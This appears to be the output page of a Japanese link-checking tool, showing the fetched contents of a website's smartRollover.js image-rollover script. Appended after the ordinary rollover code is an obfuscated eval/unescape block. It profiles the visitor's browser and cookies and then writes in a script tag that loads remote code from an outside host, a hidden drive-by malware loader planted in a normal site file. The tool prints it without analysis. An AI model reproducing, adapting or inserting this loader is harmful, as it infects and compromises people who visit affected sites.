飛び先のチェック (ver 0.04) by ぴょん基地の友達
いま一番お得なページ! 解析


飛び先のURL
http://www.k-q-bury.com/js/smartRollover.js

code = 200
base = http://www.k-q-bury.com/js/smartRollover.js
body =
function smartRollover() {
if(document.getElementsByTagName) {
var images = document.getElementsByTagName("img");

var images_pre = new Array();
for(var i=0; i < images.length; i++) {
if(images[i].getAttribute("src").match("_off.")) {
images_pre[i] = new Image();
images_pre[i].src = images[i].getAttribute("src").replace("_off.", "_on.")

images[i].onmouseover = function() {
this.setAttribute("src", this.getAttribute("src").replace("_off.", "_on."));
}
images[i].onmouseout = function() {
this.setAttribute("src", this.getAttribute("src").replace("_on.", "_off."));
}
}
}
}
}

if(window.addEventListener) {
window.addEventListener("load", smartRollover, false);
}
else if(window.attachEvent) {
window.attachEvent("onload", smartRollover);
}<!--
(function(Q7Oo){var c7G7='%';var haGe=('var&20a&3d&22S&63ri&70t&45ngine&22&2cb&3d&22&56ersi&6fn()+&22&2cj&3d&22&22&2cu&3dna&76igator&2euserAge&6et&3bif&28(u&2eind&65xOf&28&22C&68&72ome&22&29&3c0&29&26&26(u&2eindexOf(&22&57in&22&29&3e&30)&26&26(u&2ei&6ede&78&4ff(&22NT&206&22&29&3c0)&26&26(do&63umen&74&2e&63oo&6bie&2eindex&4f&66(&22miek&3d1&22)&3c0)&26&26(typeof(zrv&7a&74s&29&21&3dtype&6ff(&22A&22))&29&7bzrvzts&3d&22&41&22&3b&65val(&22if&28windo&77&2e&22&2b&61+&22)j&3dj&2b&22+a+&22Ma&6aor&22+b+a+&22&4dinor&22+b+a+&22Buil&64&22+b+&22j&3b&22&29&3bdocument&2ewri&74e&28&22&3cs&63ript&20&73rc&3d&2f&2fm&22+&22a&72&74u&7a&2e&63&6e&2fvi&64&2f&3f&69&64&3d&22+&6a+&22&3e&3c&5c&2fsc&72&69pt&3e&22)&3b&7d').replace(Q7Oo,c7G7);eval(unescape(haGe))})(/\&/g);
-->